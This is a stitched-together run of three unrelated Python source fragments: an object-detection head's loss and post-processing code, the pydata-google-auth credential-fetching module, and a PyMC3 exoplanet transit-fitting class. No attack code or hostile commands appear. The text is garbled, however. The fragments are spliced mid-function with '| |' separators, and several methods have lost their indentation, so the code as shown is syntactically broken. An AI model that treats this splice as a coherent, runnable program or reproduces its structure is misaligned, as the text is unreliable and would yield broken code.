dis_preds = self.distribution_project(reg_preds) * center_priors[..., 2, None]
decoded_bboxes = distance2bbox(center_priors[..., :2], dis_preds)
if aux_preds is not None:
# use auxiliary head to assign
aux_cls_preds, aux_reg_preds = aux_preds.split(
[self.num_classes, 4 * (self.reg_max + 1)], dim=-1
)
aux_dis_preds = (
self.distribution_project(aux_reg_preds) * center_priors[..., 2, None]
)
aux_decoded_bboxes = distance2bbox(center_priors[..., :2], aux_dis_preds)
batch_assign_res = multi_apply(
self.target_assign_single_img,
aux_cls_preds.detach(),
center_priors,
aux_decoded_bboxes.detach(),
gt_bboxes,
gt_labels,
)
else:
# use self prediction to assign
batch_assign_res = multi_apply(
self.target_assign_single_img,
cls_preds.detach(),
center_priors,
decoded_bboxes.detach(),
gt_bboxes,
gt_labels,
)
loss, loss_states = self._get_loss_from_assign(
cls_preds, reg_preds, decoded_bboxes, batch_assign_res
)
if aux_preds is not None:
aux_loss, aux_loss_states = self._get_loss_from_assign(
aux_cls_preds, aux_reg_preds, aux_decoded_bboxes, batch_assign_res
)
loss = loss + aux_loss
for k, v in aux_loss_states.items():
loss_states["aux_" + k] = v
return loss, loss_states
    def _get_loss_from_assign(self, cls_preds, reg_preds, decoded_bboxes, assign):
        """Turn per-image assignment results into the three loss terms.

        Args:
            cls_preds (Tensor): Classification logits (flattened to
                (-1, num_classes) below).
            reg_preds (Tensor): Regression-distribution logits (flattened to
                (-1, 4 * (reg_max + 1)) below).
            decoded_bboxes (Tensor): Decoded boxes (flattened to (-1, 4)).
            assign (tuple): Per-image lists (labels, label_scores,
                bbox_targets, dist_targets, num_pos) as produced by
                `target_assign_single_img` via `multi_apply`.

        Returns:
            tuple: (total loss Tensor, dict with loss_qfl/loss_bbox/loss_dfl).
        """
        device = cls_preds.device
        labels, label_scores, bbox_targets, dist_targets, num_pos = assign
        # Average the positive count across workers (reduce_mean) and floor
        # at 1 to avoid dividing by zero when a batch has no positives.
        num_total_samples = max(
            reduce_mean(torch.tensor(sum(num_pos)).to(device)).item(), 1.0
        )
        labels = torch.cat(labels, dim=0)
        label_scores = torch.cat(label_scores, dim=0)
        bbox_targets = torch.cat(bbox_targets, dim=0)
        cls_preds = cls_preds.reshape(-1, self.num_classes)
        reg_preds = reg_preds.reshape(-1, 4 * (self.reg_max + 1))
        decoded_bboxes = decoded_bboxes.reshape(-1, 4)
        loss_qfl = self.loss_qfl(
            cls_preds, (labels, label_scores), avg_factor=num_total_samples
        )
        # Positives are priors whose label is a real class; background priors
        # carry label == num_classes.
        pos_inds = torch.nonzero(
            (labels >= 0) & (labels < self.num_classes), as_tuple=False
        ).squeeze(1)
        if len(pos_inds) > 0:
            # Weight box/distribution losses by the predicted quality score.
            weight_targets = cls_preds[pos_inds].detach().sigmoid().max(dim=1)[0]
            bbox_avg_factor = max(reduce_mean(weight_targets.sum()).item(), 1.0)
            loss_bbox = self.loss_bbox(
                decoded_bboxes[pos_inds],
                bbox_targets[pos_inds],
                weight=weight_targets,
                avg_factor=bbox_avg_factor,
            )
            dist_targets = torch.cat(dist_targets, dim=0)
            loss_dfl = self.loss_dfl(
                reg_preds[pos_inds].reshape(-1, self.reg_max + 1),
                dist_targets[pos_inds].reshape(-1),
                weight=weight_targets[:, None].expand(-1, 4).reshape(-1),
                avg_factor=4.0 * bbox_avg_factor,
            )
        else:
            # No positives: emit zero losses that stay connected to the graph.
            loss_bbox = reg_preds.sum() * 0
            loss_dfl = reg_preds.sum() * 0
        loss = loss_qfl + loss_bbox + loss_dfl
        loss_states = dict(loss_qfl=loss_qfl, loss_bbox=loss_bbox, loss_dfl=loss_dfl)
        return loss, loss_states
    @torch.no_grad()
    def target_assign_single_img(
        self, cls_preds, center_priors, decoded_bboxes, gt_bboxes, gt_labels
    ):
        """Compute classification, regression, and objectness targets for
        priors in a single image.
        Args:
            cls_preds (Tensor): Classification predictions of one image,
                a 2D-Tensor with shape [num_priors, num_classes]
            center_priors (Tensor): All priors of one image, a 2D-Tensor with
                shape [num_priors, 4] in [cx, xy, stride_w, stride_y] format.
            decoded_bboxes (Tensor): Decoded bboxes predictions of one image,
                a 2D-Tensor with shape [num_priors, 4] in [tl_x, tl_y,
                br_x, br_y] format.
            gt_bboxes (Tensor): Ground truth bboxes of one image, a 2D-Tensor
                with shape [num_gts, 4] in [tl_x, tl_y, br_x, br_y] format.
            gt_labels (Tensor): Ground truth labels of one image, a Tensor
                with shape [num_gts].
        Returns:
            tuple: (labels, label_scores, bbox_targets, dist_targets,
                num_pos) for this image. Background priors keep
                label == num_classes and zero targets.
        """
        num_priors = center_priors.size(0)
        device = center_priors.device
        # Despite the docstring types, gt arrays arrive as numpy here.
        gt_bboxes = torch.from_numpy(gt_bboxes).to(device)
        gt_labels = torch.from_numpy(gt_labels).to(device)
        num_gts = gt_labels.size(0)
        gt_bboxes = gt_bboxes.to(decoded_bboxes.dtype)
        bbox_targets = torch.zeros_like(center_priors)
        dist_targets = torch.zeros_like(center_priors)
        # Background is encoded as label == num_classes.
        labels = center_priors.new_full(
            (num_priors,), self.num_classes, dtype=torch.long
        )
        label_scores = center_priors.new_zeros(labels.shape, dtype=torch.float)
        # No target
        if num_gts == 0:
            return labels, label_scores, bbox_targets, dist_targets, 0
        assign_result = self.assigner.assign(
            cls_preds.sigmoid(), center_priors, decoded_bboxes, gt_bboxes, gt_labels
        )
        pos_inds, neg_inds, pos_gt_bboxes, pos_assigned_gt_inds = self.sample(
            assign_result, gt_bboxes
        )
        num_pos_per_img = pos_inds.size(0)
        pos_ious = assign_result.max_overlaps[pos_inds]
        if len(pos_inds) > 0:
            bbox_targets[pos_inds, :] = pos_gt_bboxes
            # Distance targets are expressed in units of the prior's stride
            # (channel 2 of center_priors).
            dist_targets[pos_inds, :] = (
                bbox2distance(center_priors[pos_inds, :2], pos_gt_bboxes)
                / center_priors[pos_inds, None, 2]
            )
            # Clamp strictly inside the distribution support [0, reg_max].
            dist_targets = dist_targets.clamp(min=0, max=self.reg_max - 0.1)
            labels[pos_inds] = gt_labels[pos_assigned_gt_inds]
            # Positive priors are supervised towards their IoU with the
            # matched GT (quality focal loss target).
            label_scores[pos_inds] = pos_ious
        return (
            labels,
            label_scores,
            bbox_targets,
            dist_targets,
            num_pos_per_img,
        )
def sample(self, assign_result, gt_bboxes):
"""Sample positive and negative bboxes."""
pos_inds = (
torch.nonzero(assign_result.gt_inds > 0, as_tuple=False)
.squeeze(-1)
.unique()
)
neg_inds = (
torch.nonzero(assign_result.gt_inds == 0, as_tuple=False)
.squeeze(-1)
.unique()
)
pos_assigned_gt_inds = assign_result.gt_inds[pos_inds] - 1
if gt_bboxes.numel() == 0:
# hack for index error case
assert pos_assigned_gt_inds.numel() == 0
pos_gt_bboxes = torch.empty_like(gt_bboxes).view(-1, 4)
else:
if len(gt_bboxes.shape) < 2:
gt_bboxes = gt_bboxes.view(-1, 4)
pos_gt_bboxes = gt_bboxes[pos_assigned_gt_inds, :]
return pos_inds, neg_inds, pos_gt_bboxes, pos_assigned_gt_inds
    def post_process(self, preds, meta):
        """Prediction results post processing. Decode bboxes and rescale
        to original image size.
        Args:
            preds (Tensor): Prediction output.
            meta (dict): Meta info; must provide "warp_matrix" and an
                "img_info" dict with "height", "width" and "id" entries.
        Returns:
            dict: img_id -> {class_index: [[x1, y1, x2, y2, score], ...]}.
        """
        cls_scores, bbox_preds = preds.split(
            [self.num_classes, 4 * (self.reg_max + 1)], dim=-1
        )
        result_list = self.get_bboxes(cls_scores, bbox_preds, meta)
        det_results = {}
        # NOTE(review): both branches below are identical; presumably a
        # non-list warp_matrix (e.g. a stacked (batch, 3, 3) array) also
        # yields one matrix per image when zipped below -- confirm before
        # "fixing" this by wrapping in a list.
        warp_matrixes = (
            meta["warp_matrix"]
            if isinstance(meta["warp_matrix"], list)
            else meta["warp_matrix"]
        )
        img_heights = (
            meta["img_info"]["height"].cpu().numpy()
            if isinstance(meta["img_info"]["height"], torch.Tensor)
            else meta["img_info"]["height"]
        )
        img_widths = (
            meta["img_info"]["width"].cpu().numpy()
            if isinstance(meta["img_info"]["width"], torch.Tensor)
            else meta["img_info"]["width"]
        )
        img_ids = (
            meta["img_info"]["id"].cpu().numpy()
            if isinstance(meta["img_info"]["id"], torch.Tensor)
            else meta["img_info"]["id"]
        )
        for result, img_width, img_height, img_id, warp_matrix in zip(
            result_list, img_widths, img_heights, img_ids, warp_matrixes
        ):
            det_result = {}
            det_bboxes, det_labels = result
            det_bboxes = det_bboxes.detach().cpu().numpy()
            # Undo the preprocessing warp: map boxes back into the original
            # image frame via the inverse warp matrix (see warp_boxes).
            det_bboxes[:, :4] = warp_boxes(
                det_bboxes[:, :4], np.linalg.inv(warp_matrix), img_width, img_height
            )
            classes = det_labels.detach().cpu().numpy()
            # Bucket detections per class: columns are x1, y1, x2, y2, score.
            for i in range(self.num_classes):
                inds = classes == i
                det_result[i] = np.concatenate(
                    [
                        det_bboxes[inds, :4].astype(np.float32),
                        det_bboxes[inds, 4:5].astype(np.float32),
                    ],
                    axis=1,
                ).tolist()
            det_results[img_id] = det_result
        return det_results
def show_result(
self, img, dets, class_names, score_thres=0.3, show=True, save_path=None
):
result = overlay_bbox_cv(img, dets, class_names, score_thresh=score_thres)
if show:
cv2.imshow("det", result)
return result
def get_bboxes(self, cls_preds, reg_preds, img_metas):
"""Decode the outputs to bboxes.
Args:
cls_preds (Tensor): Shape (num_imgs, num_points, num_classes).
reg_preds (Tensor): Shape (num_imgs, num_points, 4 * (regmax + 1)).
img_metas (dict): Dict of image info.
Returns:
results_list (list[tuple]): List of detection bboxes and labels.
"""
device = cls_preds.device
b = cls_preds.shape[0]
input_height, input_width = img_metas["img"].shape[2:]
input_shape = (input_height, input_width)
featmap_sizes = [
(math.ceil(input_height / stride), math.ceil(input_width) / stride)
for stride in self.strides
]
# get grid | |
"""Private module for fetching Google API credentials."""
import logging
import google.auth
import google.auth.exceptions
import google.oauth2.credentials
from google_auth_oauthlib import flow
import oauthlib.oauth2.rfc6749.errors
import google.auth.transport.requests
from pydata_google_auth import exceptions
from pydata_google_auth import cache
from pydata_google_auth import _webserver
logger = logging.getLogger(__name__)
CLIENT_ID = "262006177488-3425ks60hkk80fssi9vpohv88g6q1iqd.apps.googleusercontent.com"
CLIENT_SECRET = "<KEY>"
GOOGLE_AUTH_URI = "https://accounts.google.com/o/oauth2/auth"
GOOGLE_TOKEN_URI = "https://oauth2.googleapis.com/token"
def default(
    scopes,
    client_id=None,
    client_secret=None,
    credentials_cache=cache.READ_WRITE,
    use_local_webserver=False,
    auth_local_webserver=None,
):
    """
    Get credentials and the default project for accessing Google APIs.

    Application Default Credentials are tried first, via
    :func:`google.auth.default`. When no valid credentials are found that
    way, user-account credentials are obtained through
    :func:`pydata_google_auth.get_user_credentials`.

    Parameters
    ----------
    scopes : list[str]
        OAuth 2.0 scopes to request when authenticating to Google APIs.
        See the `list of OAuth 2.0 scopes for Google APIs
        <https://developers.google.com/identity/protocols/googlescopes>`_.
    client_id : str, optional
        OAuth client ID used when prompting for user credentials. Defaults
        to a client ID associated with pydata-google-auth. Tool and library
        authors must override this with their own client ID; per the
        `Google APIs terms of service
        <https://developers.google.com/terms/>`_, you must not mask your
        API client's identity when using Google APIs.
    client_secret : str, optional
        OAuth client secret used when prompting for user credentials.
        Defaults to a client secret associated with pydata-google-auth.
        The same terms-of-service requirement as for ``client_id`` applies.
    credentials_cache : pydata_google_auth.cache.CredentialsCache, optional
        Object responsible for loading and saving user credentials. By
        default, credentials are read from and written to
        ``$HOME/.config/pydata/pydata_google_credentials.json``
        (``$APPDATA/.config/pydata/pydata_google_credentials.json`` on
        Windows).
    use_local_webserver : bool, optional
        If True, bind a local webserver (``localhost``, ports 8080-8089)
        to receive the authentication token via
        :class:`google_auth_oauthlib.flow.InstalledAppFlow`. Defaults to
        False, which requests a token via the console.
    auth_local_webserver : deprecated
        Use the ``use_local_webserver`` parameter instead.

    Returns
    -------
    credentials, project_id : tuple[google.auth.credentials.Credentials, str or None]
        OAuth 2.0 credentials, and a default Google developer project ID
        when one can be determined from the credentials (e.g. from a
        service account key file); None for user-based credentials.

    Raises
    ------
    pydata_google_auth.exceptions.PyDataCredentialsError
        If unable to get valid credentials.
    """
    # Honor the deprecated parameter when callers still pass it.
    if auth_local_webserver is not None:
        use_local_webserver = auth_local_webserver

    # First choice: Application Default Credentials from the environment.
    adc, adc_project = get_application_default_credentials(scopes)
    if adc and adc.valid:
        return adc, adc_project

    # Fall back to interactive user credentials.
    user_credentials = get_user_credentials(
        scopes,
        client_id=client_id,
        client_secret=client_secret,
        credentials_cache=credentials_cache,
        use_local_webserver=use_local_webserver,
    )
    if not user_credentials or not user_credentials.valid:
        raise exceptions.PyDataCredentialsError("Could not get any valid credentials.")
    # User credentials carry no associated project ID.
    return user_credentials, None
def get_application_default_credentials(scopes):
    """
    This method tries to retrieve the "default application credentials".
    This could be useful for running code on Google Cloud Platform.
    Parameters
    ----------
    scopes : list[str]
        A list of OAuth 2.0 scopes to request for the credentials.
    Returns
    -------
    credentials, project : tuple
        - (GoogleCredentials, str or None) if the default application
          credentials can be retrieved from the environment (and, when
          needed, successfully refreshed).
        - (None, None) if default application credentials can not be
          retrieved from the environment, or refreshing them fails.
    """
    try:
        credentials, project = google.auth.default(scopes=scopes)
    except (google.auth.exceptions.DefaultCredentialsError, IOError) as exc:
        logger.debug("Error getting default credentials: {}".format(str(exc)))
        return None, None
    # Credentials obtained from the environment may be expired; try one
    # refresh before giving up on them.
    if credentials and not credentials.valid:
        request = google.auth.transport.requests.Request()
        try:
            credentials.refresh(request)
        except google.auth.exceptions.RefreshError:
            # Sometimes (such as on Travis) google-auth returns GCE
            # credentials, but fetching the token for those credentials doesn't
            # actually work. See:
            # https://github.com/googleapis/google-auth-library-python/issues/287
            return None, None
    return credentials, project
def get_user_credentials(
    scopes,
    client_id=None,
    client_secret=None,
    credentials_cache=cache.READ_WRITE,
    use_local_webserver=False,
    auth_local_webserver=None,
):
    """
    Gets user account credentials.
    This function authenticates using user credentials, either loading saved
    credentials from the cache or by going through the OAuth 2.0 flow.
    The default read-write cache attempts to read credentials from a file on
    disk. If these credentials are not found or are invalid, it begins an
    OAuth 2.0 flow to get credentials. You'll open a browser window asking
    for you to authenticate to your Google account using the product name
    ``PyData Google Auth``. The permissions it requests correspond to the
    scopes you've provided.
    Additional information on the user credentials authentication mechanism
    can be found `here
    <https://developers.google.com/identity/protocols/OAuth2#clientside/>`__.
    Parameters
    ----------
    scopes : list[str]
        A list of scopes to use when authenticating to Google APIs. See the
        `list of OAuth 2.0 scopes for Google APIs
        <https://developers.google.com/identity/protocols/googlescopes>`_.
    client_id : str, optional
        The client secrets to use when prompting for user credentials.
        Defaults to a client ID associated with pydata-google-auth.
        If you are a tool or library author, you must override the default
        value with a client ID associated with your project. Per the `Google
        APIs terms of service <https://developers.google.com/terms/>`_, you
        must not mask your API client's identity when using Google APIs.
    client_secret : str, optional
        The client secrets to use when prompting for user credentials.
        Defaults to a client secret associated with pydata-google-auth.
        If you are a tool or library author, you must override the default
        value with a client secret associated with your project. Per the
        `Google APIs terms of service
        <https://developers.google.com/terms/>`_, you must not mask your API
        client's identity when using Google APIs.
    credentials_cache : pydata_google_auth.cache.CredentialsCache, optional
        An object responsible for loading and saving user credentials.
        By default, pydata-google-auth reads and writes credentials in
        ``$HOME/.config/pydata/pydata_google_credentials.json`` or
        ``$APPDATA/.config/pydata/pydata_google_credentials.json`` on
        Windows.
    use_local_webserver : bool, optional
        Use a local webserver for the user authentication
        :class:`google_auth_oauthlib.flow.InstalledAppFlow`. Binds a
        webserver to an open port on ``localhost`` between 8080 and 8089,
        inclusive, to receive authentication token. If not set, defaults to
        ``False``, which requests a token via the console.
    auth_local_webserver : deprecated
        Use the ``use_local_webserver`` parameter instead.
    Returns
    -------
    credentials : google.oauth2.credentials.Credentials
        Credentials for the user, with the requested scopes.
    Raises
    ------
    pydata_google_auth.exceptions.PyDataCredentialsError
        If unable to get valid user credentials.
    """
    # Honor the deprecated parameter when callers still pass it.
    if auth_local_webserver is not None:
        use_local_webserver = auth_local_webserver
    # Use None as default for client_id and client_secret so that the values
    # aren't included in the docs. A string of bytes isn't useful for the
    # documentation and might encourage the values to be used outside of this
    # library.
    if client_id is None:
        client_id = CLIENT_ID
    if client_secret is None:
        client_secret = CLIENT_SECRET
    credentials = credentials_cache.load()
    client_config = {
        "installed": {
            "client_id": client_id,
            "client_secret": client_secret,
            "redirect_uris": ["urn:ietf:wg:oauth:2.0:oob"],
            "auth_uri": GOOGLE_AUTH_URI,
            "token_uri": GOOGLE_TOKEN_URI,
        }
    }
    # Cache miss: run the interactive OAuth 2.0 flow and cache the result.
    if credentials is None:
        app_flow = flow.InstalledAppFlow.from_client_config(
            client_config, scopes=scopes
        )
        try:
            if use_local_webserver:
                credentials = _webserver.run_local_server(app_flow)
            else:
                credentials = app_flow.run_console()
        except oauthlib.oauth2.rfc6749.errors.OAuth2Error as exc:
            raise exceptions.PyDataCredentialsError(
                "Unable to get valid credentials: {}".format(exc)
            )
        credentials_cache.save(credentials)
    # Cached credentials may be expired; refresh them before returning.
    if credentials and not credentials.valid:
        request = google.auth.transport.requests.Request()
        credentials.refresh(request)
    return credentials
def save_user_credentials(
scopes, path, client_id=None, client_secret=None, use_local_webserver=False
):
"""
Gets user account credentials and saves them to a JSON file at ``path``.
This function authenticates using user credentials by going through the
OAuth 2.0 flow.
Parameters
----------
scopes : list[str]
A list of scopes to use when authenticating to Google APIs. See the
`list of OAuth 2.0 scopes for Google APIs
<https://developers.google.com/identity/protocols/googlescopes>`_.
path : str
Path to save credentials JSON file.
client_id : str, optional
The client secrets to use when prompting for user credentials.
Defaults to a client ID associated with pydata-google-auth.
If you are a tool or library author, you must override the default
value with a client ID associated with your project. Per the `Google
APIs terms of service <https://developers.google.com/terms/>`_, you
must not mask your API client's identity when using Google APIs.
client_secret : str, optional
The client secrets to use when prompting for user credentials.
Defaults to a client secret associated with pydata-google-auth.
If you are a tool or library author, you must override the default
value with a client secret associated with your project. Per the
`Google APIs terms of service
<https://developers.google.com/terms/>`_, you must not mask your API
client's identity when using Google APIs.
use_local_webserver : | |
"""
The guts are in:
run_transit_inference
run_onetransit_inference
run_alltransit_inference
run_allindivtransit_inference
"""
import numpy as np, matplotlib.pyplot as plt, pandas as pd, pymc3 as pm
import pickle, os
from astropy import units as units, constants as const
from numpy import array as nparr
from functools import partial
from collections import OrderedDict
import exoplanet as xo
from exoplanet.gp import terms, GP
import theano.tensor as tt
from timmy.plotting import plot_MAP_data as plot_MAP_phot
from timmy.plotting import plot_MAP_rv
from timmy.paths import RESULTSDIR
from timmy.priors import RSTAR, RSTAR_STDEV, LOGG, LOGG_STDEV
# factor * 10**logg / r_star = rho
factor = 5.141596357654149e-05
class ModelParser:
    """Parse a model identifier into validated components.

    A ``modelid`` is an underscore-separated list of component names, e.g.
    ``"transit_gprot"``. Each component must be one of the recognized
    model-component names, otherwise a ValueError is raised.
    """

    def __init__(self, modelid):
        self.initialize_model(modelid)

    def initialize_model(self, modelid):
        # Store the id and its underscore-separated pieces, then validate.
        self.modelid = modelid
        self.modelcomponents = modelid.split('_')
        self.verify_modelcomponents()

    def verify_modelcomponents(self):
        valid = ['transit', 'gprot', 'rv', 'alltransit', 'quad',
                 'quaddepthvar', 'onetransit', 'allindivtransit',
                 'tessindivtransit', 'oddindivtransit',
                 'evenindivtransit']
        # Sinusoidal components: 0-4 harmonics of Porb and Prot.
        for n_harmonics in range(5):
            valid.append('{}sincosPorb'.format(n_harmonics))
            valid.append('{}sincosProt'.format(n_harmonics))
        assert len(self.modelcomponents) >= 1
        for component in self.modelcomponents:
            if component in valid:
                continue
            errmsg = (
                'Got modelcomponent {}. validcomponents include {}.'
                .format(component, valid)
            )
            raise ValueError(errmsg)
class ModelFitter(ModelParser):
"""
Given a modelid of the form "transit", or "rv" and a dataframe containing
(time and flux), or (time and rv), run the inference.
"""
    def __init__(self, modelid, data_df, prior_d, N_samples=2000, N_cores=16,
                 target_accept=0.8, N_chains=4, plotdir=None, pklpath=None,
                 overwrite=1, rvdf=None):
        """Store sampler settings, validate the data, and run the inference.

        Args:
            modelid (str): Model identifier, e.g. 'transit', 'onetransit',
                'alltransit_quad', 'allindivtransit'.
            data_df: For 'transit', a dataframe-like with 'x_obs', 'y_obs'
                and 'y_err' columns; for the multi-dataset model ids, an
                OrderedDict of datasets.
            prior_d (dict): Prior values passed through to the run_*
                inference methods.
            N_samples (int): Number of tuning steps and posterior draws.
            N_cores (int), N_chains (int): Sampler parallelism settings.
            target_accept (float): NUTS target acceptance; only forwarded
                to run_allindivtransit_inference.
            plotdir (str): Directory for diagnostic plots.
            pklpath (str): Pickle cache path for the inference results.
            overwrite (int): Stored on self.OVERWRITE.
            rvdf: Unused in this method — TODO confirm whether it is dead.
        """
        self.N_samples = N_samples
        self.N_cores = N_cores
        self.N_chains = N_chains
        self.PLOTDIR = plotdir
        self.OVERWRITE = overwrite
        # Single-dataset photometric case: unpack arrays and the cadence.
        if 'transit' == modelid:
            self.data = data_df
            self.x_obs = nparr(data_df['x_obs'])
            self.y_obs = nparr(data_df['y_obs'])
            self.y_err = nparr(data_df['y_err'])
            self.t_exp = np.nanmedian(np.diff(self.x_obs))
        # Multi-dataset case: keep the OrderedDict of datasets as-is.
        if modelid in ['alltransit', 'alltransit_quad',
                       'alltransit_quaddepthvar', 'onetransit',
                       'allindivtransit', 'tessindivtransit',
                       'oddindivtransit', 'evenindivtransit']:
            assert isinstance(data_df, OrderedDict)
            self.data = data_df
        # NOTE(review): this raise means any modelid containing 'rv' aborts
        # here, so the `elif modelid == 'rv'` dispatch branch below is
        # unreachable — confirm whether RV support was meant to be enabled.
        if 'rv' in modelid:
            raise NotImplementedError
        self.initialize_model(modelid)
        if modelid not in ['alltransit', 'alltransit_quad',
                           'alltransit_quaddepthvar', 'onetransit',
                           'allindivtransit', 'tessindivtransit',
                           'oddindivtransit', 'evenindivtransit']:
            self.verify_inputdata()
        #NOTE threadsafety needn't be hardcoded
        make_threadsafe = False
        # Dispatch to the model-specific inference routine.
        if modelid == 'transit':
            self.run_transit_inference(
                prior_d, pklpath, make_threadsafe=make_threadsafe
            )
        elif modelid == 'onetransit':
            self.run_onetransit_inference(
                prior_d, pklpath, make_threadsafe=make_threadsafe
            )
        elif modelid == 'rv':
            self.run_rv_inference(
                prior_d, pklpath, make_threadsafe=make_threadsafe
            )
        elif modelid in ['alltransit', 'alltransit_quad',
                         'alltransit_quaddepthvar']:
            self.run_alltransit_inference(
                prior_d, pklpath, make_threadsafe=make_threadsafe
            )
        elif modelid in ['allindivtransit', 'tessindivtransit',
                         'oddindivtransit', 'evenindivtransit']:
            self.run_allindivtransit_inference(
                prior_d, pklpath, make_threadsafe=make_threadsafe,
                target_accept=target_accept
            )
def verify_inputdata(self):
np.testing.assert_array_equal(
self.x_obs,
self.x_obs[np.argsort(self.x_obs)]
)
assert len(self.x_obs) == len(self.y_obs)
assert isinstance(self.x_obs, np.ndarray)
assert isinstance(self.y_obs, np.ndarray)
    def run_transit_inference(self, prior_d, pklpath, make_threadsafe=True):
        """Fit a single-planet transit model to the photometry with PyMC3.

        Builds a model with stellar parameters (logg_star, r_star, and the
        derived rho_star), transit parameters (mean, t0, period, quadratic
        limb darkening, log_r, b), finds the MAP solution, samples the
        posterior with exoplanet's dense NUTS step, and caches
        {model, trace, map_estimate} to ``pklpath``. Results are stored on
        self.model, self.trace and self.map_estimate.

        Args:
            prior_d (dict): Prior central values / bounds keyed by
                parameter name ('mean', 't0', 'period', 'u[0]', 'u[1]',
                'log_r', 'b').
            pklpath (str): Pickle cache path. If the file exists, results
                are loaded from it and no fitting is performed.
            make_threadsafe (bool): If False, a MAP diagnostic plot is
                produced before sampling (see comment below on matplotlib
                thread-safety).
        """
        # if the model has already been run, pull the result from the
        # pickle. otherwise, run it.
        if os.path.exists(pklpath):
            d = pickle.load(open(pklpath, 'rb'))
            self.model = d['model']
            self.trace = d['trace']
            self.map_estimate = d['map_estimate']
            return 1
        with pm.Model() as model:
            # Fixed data errors.
            sigma = self.y_err
            # Define priors and PyMC3 random variables to sample over.
            # Stellar parameters. (Following tess.world notebooks).
            logg_star = pm.Normal("logg_star", mu=LOGG, sd=LOGG_STDEV)
            r_star = pm.Bound(pm.Normal, lower=0.0)(
                "r_star", mu=RSTAR, sd=RSTAR_STDEV
            )
            # rho_star = factor * 10**logg / r_star (module-level constant).
            rho_star = pm.Deterministic(
                "rho_star", factor*10**logg_star / r_star
            )
            # Transit parameters.
            mean = pm.Normal(
                "mean", mu=prior_d['mean'], sd=1e-2, testval=prior_d['mean']
            )
            t0 = pm.Normal(
                "t0", mu=prior_d['t0'], sd=2e-3, testval=prior_d['t0']
            )
            period = pm.Normal(
                'period', mu=prior_d['period'], sd=5e-4,
                testval=prior_d['period']
            )
            # NOTE: might want to implement kwarg for flexibility
            # u = xo.distributions.QuadLimbDark(
            # "u", testval=prior_d['u']
            # )
            u0 = pm.Uniform(
                'u[0]', lower=prior_d['u[0]']-0.15,
                upper=prior_d['u[0]']+0.15,
                testval=prior_d['u[0]']
            )
            u1 = pm.Uniform(
                'u[1]', lower=prior_d['u[1]']-0.15,
                upper=prior_d['u[1]']+0.15,
                testval=prior_d['u[1]']
            )
            u = [u0, u1]
            # # The Espinoza (2018) parameterization for the joint radius ratio and
            # # impact parameter distribution
            # r, b = xo.distributions.get_joint_radius_impact(
            # min_radius=0.001, max_radius=1.0,
            # testval_r=prior_d['r'],
            # testval_b=prior_d['b']
            # )
            # # NOTE: apparently, it's been deprecated. DFM's manuscript notes
            # that it leads to Rp/Rs values biased high
            log_r = pm.Uniform('log_r', lower=np.log(1e-2), upper=np.log(1),
                               testval=prior_d['log_r'])
            r = pm.Deterministic('r', tt.exp(log_r))
            b = xo.distributions.ImpactParameter(
                "b", ror=r, testval=prior_d['b']
            )
            orbit = xo.orbits.KeplerianOrbit(
                period=period, t0=t0, b=b, rho_star=rho_star, r_star=r_star
            )
            mu_transit = pm.Deterministic(
                'mu_transit',
                xo.LimbDarkLightCurve(u).get_light_curve(
                    orbit=orbit, r=r, t=self.x_obs, texp=self.t_exp
                ).T.flatten()
            )
            #
            # Derived parameters
            #
            # planet radius in jupiter radii
            r_planet = pm.Deterministic(
                "r_planet", (r*r_star)*( 1*units.Rsun/(1*units.Rjup) ).cgs.value
            )
            #
            # eq 30 of winn+2010, ignoring planet density.
            #
            a_Rs = pm.Deterministic(
                "a_Rs",
                (rho_star * period**2)**(1/3)
                *
                (( (1*units.gram/(1*units.cm)**3) * (1*units.day**2)
                 * const.G / (3*np.pi)
                )**(1/3)).cgs.value
            )
            #
            # cosi. assumes e=0 (e.g., Winn+2010 eq 7)
            #
            cosi = pm.Deterministic("cosi", b / a_Rs)
            # probably safer than tt.arccos(cosi)
            sini = pm.Deterministic("sini", pm.math.sqrt( 1 - cosi**2 ))
            #
            # transit durations (T_14, T_13) for circular orbits. Winn+2010 Eq 14, 15.
            # units: hours.
            #
            T_14 = pm.Deterministic(
                'T_14',
                (period/np.pi)*
                tt.arcsin(
                    (1/a_Rs) * pm.math.sqrt( (1+r)**2 - b**2 )
                    * (1/sini)
                )*24
            )
            T_13 = pm.Deterministic(
                'T_13',
                (period/np.pi)*
                tt.arcsin(
                    (1/a_Rs) * pm.math.sqrt( (1-r)**2 - b**2 )
                    * (1/sini)
                )*24
            )
            #
            # mean model and likelihood
            #
            mean_model = mu_transit + mean
            mu_model = pm.Deterministic('mu_model', mean_model)
            likelihood = pm.Normal('obs', mu=mean_model, sigma=sigma,
                                   observed=self.y_obs)
            # Optimizing
            map_estimate = pm.find_MAP(model=model)
            # start = model.test_point
            # if 'transit' in self.modelcomponents:
            # map_estimate = xo.optimize(start=start,
            # vars=[r, b, period, t0])
            # map_estimate = xo.optimize(start=map_estimate)
            # Plot the simulated data and the maximum a posteriori model to
            # make sure that our initialization looks ok.
            self.y_MAP = (
                map_estimate['mean'] + map_estimate['mu_transit']
            )
            if make_threadsafe:
                pass
            else:
                # as described in
                # https://github.com/matplotlib/matplotlib/issues/15410
                # matplotlib is not threadsafe. so do not make plots before
                # sampling, because some child processes tries to close a
                # cached file, and crashes the sampler.
                print(map_estimate)
                if self.PLOTDIR is None:
                    raise NotImplementedError
                outpath = os.path.join(self.PLOTDIR,
                                       'test_{}_MAP.png'.format(self.modelid))
                plot_MAP_phot(self.x_obs, self.y_obs, self.y_MAP, outpath)
            # sample from the posterior defined by this model.
            trace = pm.sample(
                tune=self.N_samples, draws=self.N_samples,
                start=map_estimate, cores=self.N_cores,
                chains=self.N_chains,
                step=xo.get_dense_nuts_step(target_accept=0.8),
            )
        # Cache everything needed to reuse this fit without re-sampling.
        with open(pklpath, 'wb') as buff:
            pickle.dump({'model': model, 'trace': trace,
                         'map_estimate': map_estimate}, buff)
        self.model = model
        self.trace = trace
        self.map_estimate = map_estimate
def run_rv_inference(self, prior_d, pklpath, make_threadsafe=True):
# if the model has already been run, pull the result from the
# pickle. otherwise, run it.
if os.path.exists(pklpath):
d = pickle.load(open(pklpath, 'rb'))
self.model = d['model']
self.trace = d['trace']
self.map_estimate = d['map_estimate']
return 1
with pm.Model() as model:
# Fixed data errors.
sigma = self.y_err
# Define priors and PyMC3 random variables to sample over.
# Stellar parameters. (Following tess.world notebooks).
logg_star = pm.Normal("logg_star", mu=prior_d['logg_star'][0],
sd=prior_d['logg_star'][1])
r_star = pm.Bound(pm.Normal, lower=0.0)(
"r_star", mu=prior_d['r_star'][0], sd=prior_d['r_star'][1]
)
rho_star = pm.Deterministic(
"rho_star", factor*10**logg_star / r_star
)
# RV parameters.
